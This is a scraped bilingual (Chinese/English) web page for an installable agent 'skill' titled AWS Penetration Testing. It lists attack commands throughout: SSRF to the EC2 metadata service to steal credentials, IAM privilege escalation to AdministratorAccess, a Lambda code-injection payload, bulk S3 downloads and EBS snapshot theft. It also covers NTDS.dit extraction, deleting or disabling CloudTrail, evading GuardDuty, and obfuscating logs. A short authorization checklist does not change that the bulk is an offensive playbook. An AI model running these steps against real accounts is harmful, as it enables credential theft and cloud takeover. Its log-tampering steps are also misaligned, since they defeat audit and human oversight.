AWS渗透测试实战指南：IAM枚举、权限提升与红队持久化技术

AWS Penetration Testing by automindtechnologie-jpg/ultimate-skill.md

GitHub

安装命令

npx skills add https://github.com/automindtechnologie-jpg/ultimate-skill.md --skill 'AWS Penetration Testing'

自动化云服务安全

🇨🇳中文介绍

AWS 渗透测试

目的

提供针对 AWS 云环境进行渗透测试的全面技术。涵盖 IAM 枚举、权限提升、SSRF 攻击元数据端点、S3 存储桶利用、Lambda 代码提取以及红队操作的持久化技术。

输入/先决条件

配置好凭据的 AWS CLI
有效的 AWS 凭据（即使是低权限的）
理解 AWS IAM 模型
Python 3，boto3 库
工具：Pacu，Prowler，ScoutSuite，SkyArk

输出/交付成果

IAM 权限提升路径
提取的凭据和密钥
被攻陷的 EC2/Lambda/S3 资源
持久化机制
安全审计发现

必备工具

工具	用途	安装
Pacu	AWS 利用框架	`git clone https://github.com/RhinoSecurityLabs/pacu`
SkyArk	影子管理员发现	`Import-Module .\SkyArk.ps1`
Prowler	安全审计

🇺🇸English

AWS Penetration Testing

Purpose

Provide comprehensive techniques for penetration testing AWS cloud environments. Covers IAM enumeration, privilege escalation, SSRF to metadata endpoint, S3 bucket exploitation, Lambda code extraction, and persistence techniques for red team operations.

Inputs/Prerequisites

AWS CLI configured with credentials
Valid AWS credentials (even low-privilege)
Understanding of AWS IAM model
Python 3, boto3 library
Tools: Pacu, Prowler, ScoutSuite, SkyArk

Outputs/Deliverables

IAM privilege escalation paths
Extracted credentials and secrets
Compromised EC2/Lambda/S3 resources
Persistence mechanisms
Security audit findings

Essential Tools

Tool	Purpose	Installation
Pacu	AWS exploitation framework	`git clone https://github.com/RhinoSecurityLabs/pacu`
SkyArk	Shadow Admin discovery

广告位招租

在这里展示您的产品或服务

触达数万 AI 开发者，精准高效

联系我们

步骤 1：初始枚举

识别被攻陷的身份和权限：

# 检查当前身份
aws sts get-caller-identity

# 配置配置文件
aws configure --profile compromised

# 列出访问密钥
aws iam list-access-keys

# 枚举权限
./enumerate-iam.py --access-key AKIA... --secret-key StF0q...

步骤 2：IAM 枚举

# 列出所有用户
aws iam list-users

# 列出用户所属组
aws iam list-groups-for-user --user-name TARGET_USER

# 列出附加的策略
aws iam list-attached-user-policies --user-name TARGET_USER

# 列出内联策略
aws iam list-user-policies --user-name TARGET_USER

# 获取策略详情
aws iam get-policy --policy-arn POLICY_ARN
aws iam get-policy-version --policy-arn POLICY_ARN --version-id v1

# 列出角色
aws iam list-roles
aws iam list-attached-role-policies --role-name ROLE_NAME

步骤 3：元数据 SSRF (EC2)

利用 SSRF 访问元数据端点 (IMDSv1)：

# 访问元数据端点
http://169.254.169.254/latest/meta-data/

# 获取 IAM 角色名称
http://169.254.169.254/latest/meta-data/iam/security-credentials/

# 提取临时凭据
http://169.254.169.254/latest/meta-data/iam/security-credentials/ROLE-NAME

# 响应包含：
{
  "AccessKeyId": "ASIA...",
  "SecretAccessKey": "...",
  "Token": "...",
  "Expiration": "2019-08-01T05:20:30Z"
}

对于 IMDSv2 (需要令牌)：

# 首先获取令牌
TOKEN=$(curl -X PUT -H "X-aws-ec2-metadata-token-ttl-seconds: 21600" \
  "http://169.254.169.254/latest/api/token")

# 使用令牌进行请求
curl -H "X-aws-ec2-metadata-token:$TOKEN" \
  "http://169.254.169.254/latest/meta-data/iam/security-credentials/"

Fargate 容器凭据：

# 读取环境变量获取凭据路径
/proc/self/environ
# 查找：AWS_CONTAINER_CREDENTIALS_RELATIVE_URI=/v2/credentials/...

# 访问凭据
http://169.254.170.2/v2/credentials/CREDENTIAL-PATH

影子管理员权限

这些权限等同于管理员权限：

权限	利用方式
`iam:CreateAccessKey`	为管理员用户创建密钥
`iam:CreateLoginProfile`	为任何用户设置密码
`iam:AttachUserPolicy`	将管理员策略附加给自己
`iam:PutUserPolicy`	添加内联管理员策略
`iam:AddUserToGroup`	将自己添加到管理员组
`iam:PassRole` + `ec2:RunInstances`	启动具有管理员角色的 EC2 实例
`lambda:UpdateFunctionCode`	向 Lambda 函数注入代码

为其他用户创建访问密钥

aws iam create-access-key --user-name target_user

附加管理员策略

aws iam attach-user-policy --user-name my_username \
  --policy-arn arn:aws:iam::aws:policy/AdministratorAccess

添加内联管理员策略

aws iam put-user-policy --user-name my_username \
  --policy-name admin_policy \
  --policy-document file://admin-policy.json

# code.py - 注入到 Lambda 函数中
import boto3

def lambda_handler(event, context):
    client = boto3.client('iam')
    response = client.attach_user_policy(
        UserName='my_username',
        PolicyArn="arn:aws:iam::aws:policy/AdministratorAccess"
    )
    return response

# 更新 Lambda 代码
aws lambda update-function-code --function-name target_function \
  --zip-file fileb://malicious.zip

# 使用 bucket_finder
./bucket_finder.rb wordlist.txt
./bucket_finder.rb --download --region us-east-1 wordlist.txt

# 常见的存储桶 URL 模式
https://{bucket-name}.s3.amazonaws.com
https://s3.amazonaws.com/{bucket-name}

# 列出存储桶 (使用凭据)
aws s3 ls

# 列出存储桶内容
aws s3 ls s3://bucket-name --recursive

# 下载所有文件
aws s3 sync s3://bucket-name ./local-folder

公开存储桶搜索

https://buckets.grayhatwarfare.com/

# 列出 Lambda 函数
aws lambda list-functions

# 获取函数代码
aws lambda get-function --function-name FUNCTION_NAME
# 下载响应中提供的 URL

# 调用函数
aws lambda invoke --function-name FUNCTION_NAME output.txt

Systems Manager 允许在 EC2 实例上执行命令：

# 列出托管实例
aws ssm describe-instance-information

# 执行命令
aws ssm send-command --instance-ids "i-0123456789" \
  --document-name "AWS-RunShellScript" \
  --parameters commands="whoami"

# 获取命令输出
aws ssm list-command-invocations --command-id "CMD-ID" \
  --details --query "CommandInvocations[].CommandPlugins[].Output"

# 创建目标卷的快照
aws ec2 create-snapshot --volume-id vol-xxx --description "Audit"

# 从快照创建卷
aws ec2 create-volume --snapshot-id snap-xxx --availability-zone us-east-1a

# 附加到攻击者实例
aws ec2 attach-volume --volume-id vol-xxx --instance-id i-xxx --device /dev/xvdf

# 挂载并访问
sudo mkdir /mnt/stolen
sudo mount /dev/xvdf1 /mnt/stolen

卷影复制攻击 (Windows DC)

# CloudCopy 技术
# 1. 创建 DC 卷的快照
# 2. 与攻击者账户共享快照
# 3. 在攻击者实例中挂载
# 4. 提取 NTDS.dit 和 SYSTEM
secretsdump.py -system ./SYSTEM -ntds ./ntds.dit local

从 API 密钥获取控制台访问

将 CLI 凭据转换为控制台访问：

git clone https://github.com/NetSPI/aws_consoler
aws_consoler -v -a AKIAXXXXXXXX -s SECRETKEY

# 生成控制台登录 URL

# 删除跟踪
aws cloudtrail delete-trail --name trail_name

# 禁用全局事件
aws cloudtrail update-trail --name trail_name \
  --no-include-global-service-events

# 禁用特定区域
aws cloudtrail update-trail --name trail_name \
  --no-include-global-service-events --no-is-multi-region-trail

注意： Kali/Parrot/Pentoo Linux 会基于用户代理触发 GuardDuty 警报。请使用修改了用户代理的 Pacu。

任务	命令
获取身份	`aws sts get-caller-identity`
列出用户	`aws iam list-users`
列出角色	`aws iam list-roles`
列出存储桶	`aws s3 ls`
列出 EC2	`aws ec2 describe-instances`
列出 Lambda	`aws lambda list-functions`
获取元数据	`curl http://169.254.169.254/latest/meta-data/`

测试前获得书面授权
记录所有操作以供审计追踪
仅测试范围内的资源

未经批准修改生产数据
未经记录留下持久后门
永久禁用安全控制

尝试元数据攻击前检查 IMDSv2
利用前进行彻底枚举
任务结束后清理测试资源

示例 1：SSRF 获取管理员权限

# 1. 在 Web 应用中寻找 SSRF 漏洞
https://app.com/proxy?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/

# 2. 从响应中获取角色名称
# 3. 提取凭据
https://app.com/proxy?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/AdminRole

# 4. 使用窃取的凭据配置 AWS CLI
export AWS_ACCESS_KEY_ID=ASIA...
export AWS_SECRET_ACCESS_KEY=...
export AWS_SESSION_TOKEN=...

# 5. 验证访问权限
aws sts get-caller-identity

问题	解决方案
所有命令都访问被拒绝	使用 enumerate-iam 枚举权限
元数据端点被阻止	检查 IMDSv2，尝试容器元数据
GuardDuty 警报	使用带有自定义用户代理的 Pacu
凭据过期	从元数据重新获取 (临时凭据会轮换)
CloudTrail 记录操作	考虑禁用或混淆日志

有关高级技术，包括 Lambda/API Gateway 利用、Secrets Manager & KMS、容器安全 (ECS/EKS/ECR)、RDS/DynamoDB 利用、VPC 横向移动以及安全检查清单，请参阅 references/advanced-aws-pentesting.md。

Import-Module .\SkyArk.ps1

Step 1: Initial Enumeration

Identify the compromised identity and permissions:

# Check current identity
aws sts get-caller-identity

# Configure profile
aws configure --profile compromised

# List access keys
aws iam list-access-keys

# Enumerate permissions
./enumerate-iam.py --access-key AKIA... --secret-key StF0q...

Step 2: IAM Enumeration

# List all users
aws iam list-users

# List groups for user
aws iam list-groups-for-user --user-name TARGET_USER

# List attached policies
aws iam list-attached-user-policies --user-name TARGET_USER

# List inline policies
aws iam list-user-policies --user-name TARGET_USER

# Get policy details
aws iam get-policy --policy-arn POLICY_ARN
aws iam get-policy-version --policy-arn POLICY_ARN --version-id v1

# List roles
aws iam list-roles
aws iam list-attached-role-policies --role-name ROLE_NAME

Step 3: Metadata SSRF (EC2)

Exploit SSRF to access metadata endpoint (IMDSv1):

# Access metadata endpoint
http://169.254.169.254/latest/meta-data/

# Get IAM role name
http://169.254.169.254/latest/meta-data/iam/security-credentials/

# Extract temporary credentials
http://169.254.169.254/latest/meta-data/iam/security-credentials/ROLE-NAME

# Response contains:
{
  "AccessKeyId": "ASIA...",
  "SecretAccessKey": "...",
  "Token": "...",
  "Expiration": "2019-08-01T05:20:30Z"
}

For IMDSv2 (token required):

# Get token first
TOKEN=$(curl -X PUT -H "X-aws-ec2-metadata-token-ttl-seconds: 21600" \
  "http://169.254.169.254/latest/api/token")

# Use token for requests
curl -H "X-aws-ec2-metadata-token:$TOKEN" \
  "http://169.254.169.254/latest/meta-data/iam/security-credentials/"

Fargate Container Credentials:

# Read environment for credential path
/proc/self/environ
# Look for: AWS_CONTAINER_CREDENTIALS_RELATIVE_URI=/v2/credentials/...

# Access credentials
http://169.254.170.2/v2/credentials/CREDENTIAL-PATH

Privilege Escalation Techniques

Shadow Admin Permissions

These permissions are equivalent to administrator:

Permission	Exploitation
`iam:CreateAccessKey`	Create keys for admin user
`iam:CreateLoginProfile`	Set password for any user
`iam:AttachUserPolicy`	Attach admin policy to self
`iam:PutUserPolicy`	Add inline admin policy
`iam:AddUserToGroup`	Add self to admin group
`iam:PassRole` + `ec2:RunInstances`	Launch EC2 with admin role
`lambda:UpdateFunctionCode`	Inject code into Lambda

Create Access Key for Another User

aws iam create-access-key --user-name target_user

aws iam attach-user-policy --user-name my_username \
  --policy-arn arn:aws:iam::aws:policy/AdministratorAccess

Add Inline Admin Policy

aws iam put-user-policy --user-name my_username \
  --policy-name admin_policy \
  --policy-document file://admin-policy.json

Lambda Privilege Escalation

# code.py - Inject into Lambda function
import boto3

def lambda_handler(event, context):
    client = boto3.client('iam')
    response = client.attach_user_policy(
        UserName='my_username',
        PolicyArn="arn:aws:iam::aws:policy/AdministratorAccess"
    )
    return response



# Update Lambda code
aws lambda update-function-code --function-name target_function \
  --zip-file fileb://malicious.zip

S3 Bucket Exploitation

# Using bucket_finder
./bucket_finder.rb wordlist.txt
./bucket_finder.rb --download --region us-east-1 wordlist.txt

# Common bucket URL patterns
https://{bucket-name}.s3.amazonaws.com
https://s3.amazonaws.com/{bucket-name}

# List buckets (with creds)
aws s3 ls

# List bucket contents
aws s3 ls s3://bucket-name --recursive

# Download all files
aws s3 sync s3://bucket-name ./local-folder

Public Bucket Search

https://buckets.grayhatwarfare.com/

# List Lambda functions
aws lambda list-functions

# Get function code
aws lambda get-function --function-name FUNCTION_NAME
# Download URL provided in response

# Invoke function
aws lambda invoke --function-name FUNCTION_NAME output.txt

SSM Command Execution

Systems Manager allows command execution on EC2 instances:

# List managed instances
aws ssm describe-instance-information

# Execute command
aws ssm send-command --instance-ids "i-0123456789" \
  --document-name "AWS-RunShellScript" \
  --parameters commands="whoami"

# Get command output
aws ssm list-command-invocations --command-id "CMD-ID" \
  --details --query "CommandInvocations[].CommandPlugins[].Output"

# Create snapshot of target volume
aws ec2 create-snapshot --volume-id vol-xxx --description "Audit"

# Create volume from snapshot
aws ec2 create-volume --snapshot-id snap-xxx --availability-zone us-east-1a

# Attach to attacker instance
aws ec2 attach-volume --volume-id vol-xxx --instance-id i-xxx --device /dev/xvdf

# Mount and access
sudo mkdir /mnt/stolen
sudo mount /dev/xvdf1 /mnt/stolen

Shadow Copy Attack (Windows DC)

# CloudCopy technique
# 1. Create snapshot of DC volume
# 2. Share snapshot with attacker account
# 3. Mount in attacker instance
# 4. Extract NTDS.dit and SYSTEM
secretsdump.py -system ./SYSTEM -ntds ./ntds.dit local

Console Access from API Keys

Convert CLI credentials to console access:

git clone https://github.com/NetSPI/aws_consoler
aws_consoler -v -a AKIAXXXXXXXX -s SECRETKEY

# Generates signin URL for console access

# Delete trail
aws cloudtrail delete-trail --name trail_name

# Disable global events
aws cloudtrail update-trail --name trail_name \
  --no-include-global-service-events

# Disable specific region
aws cloudtrail update-trail --name trail_name \
  --no-include-global-service-events --no-is-multi-region-trail

Note: Kali/Parrot/Pentoo Linux triggers GuardDuty alerts based on user-agent. Use Pacu which modifies the user-agent.

Task	Command
Get identity	`aws sts get-caller-identity`
List users	`aws iam list-users`
List roles	`aws iam list-roles`
List buckets	`aws s3 ls`
List EC2	`aws ec2 describe-instances`
List Lambda	`aws lambda list-functions`
Get metadata	`curl http://169.254.169.254/latest/meta-data/`

Obtain written authorization before testing
Document all actions for audit trail
Test in scope resources only

Modify production data without approval
Leave persistent backdoors without documentation
Disable security controls permanently

Check for IMDSv2 before attempting metadata attacks
Enumerate thoroughly before exploitation
Clean up test resources after engagement

Example 1: SSRF to Admin

# 1. Find SSRF vulnerability in web app
https://app.com/proxy?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/

# 2. Get role name from response
# 3. Extract credentials
https://app.com/proxy?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/AdminRole

# 4. Configure AWS CLI with stolen creds
export AWS_ACCESS_KEY_ID=ASIA...
export AWS_SECRET_ACCESS_KEY=...
export AWS_SESSION_TOKEN=...

# 5. Verify access
aws sts get-caller-identity

Issue	Solution
Access Denied on all commands	Enumerate permissions with enumerate-iam
Metadata endpoint blocked	Check for IMDSv2, try container metadata
GuardDuty alerts	Use Pacu with custom user-agent
Expired credentials	Re-fetch from metadata (temp creds rotate)
CloudTrail logging actions	Consider disable or log obfuscation

Additional Resources

For advanced techniques including Lambda/API Gateway exploitation, Secrets Manager & KMS, Container security (ECS/EKS/ECR), RDS/DynamoDB exploitation, VPC lateral movement, and security checklists, see references/advanced-aws-pentesting.md.

Azure 升级评估与自动化工具 - 轻松迁移 Functions 计划、托管层级和 SKU

68,100 周安装

AWS渗透测试实战指南：IAM枚举、权限提升与红队持久化技术

🇨🇳中文介绍

AWS 渗透测试

目的

输入/先决条件

输出/交付成果

必备工具

🇺🇸English

AWS Penetration Testing

Purpose

Inputs/Prerequisites

Outputs/Deliverables

Essential Tools

相关 Skills

核心工作流程

步骤 1：初始枚举

步骤 2：IAM 枚举

步骤 3：元数据 SSRF (EC2)

权限提升技术

影子管理员权限

为其他用户创建访问密钥

附加管理员策略

添加内联管理员策略

Lambda 权限提升

S3 存储桶利用

存储桶发现

存储桶枚举

公开存储桶搜索

Lambda 利用

SSM 命令执行

EC2 利用

挂载 EBS 卷

卷影复制攻击 (Windows DC)

从 API 密钥获取控制台访问

清除痕迹

禁用 CloudTrail

快速参考

约束

示例

示例 1：SSRF 获取管理员权限

故障排除

其他资源

Core Workflow

Step 1: Initial Enumeration

Step 2: IAM Enumeration

Step 3: Metadata SSRF (EC2)

Privilege Escalation Techniques

Shadow Admin Permissions

Create Access Key for Another User

Attach Admin Policy

Add Inline Admin Policy

Lambda Privilege Escalation

S3 Bucket Exploitation

Bucket Discovery

Bucket Enumeration

Public Bucket Search

Lambda Exploitation

SSM Command Execution

EC2 Exploitation

Mount EBS Volume

Shadow Copy Attack (Windows DC)

Console Access from API Keys

Covering Tracks

Disable CloudTrail

Quick Reference

Constraints

Examples

Example 1: SSRF to Admin

Troubleshooting

Additional Resources

最新 Skills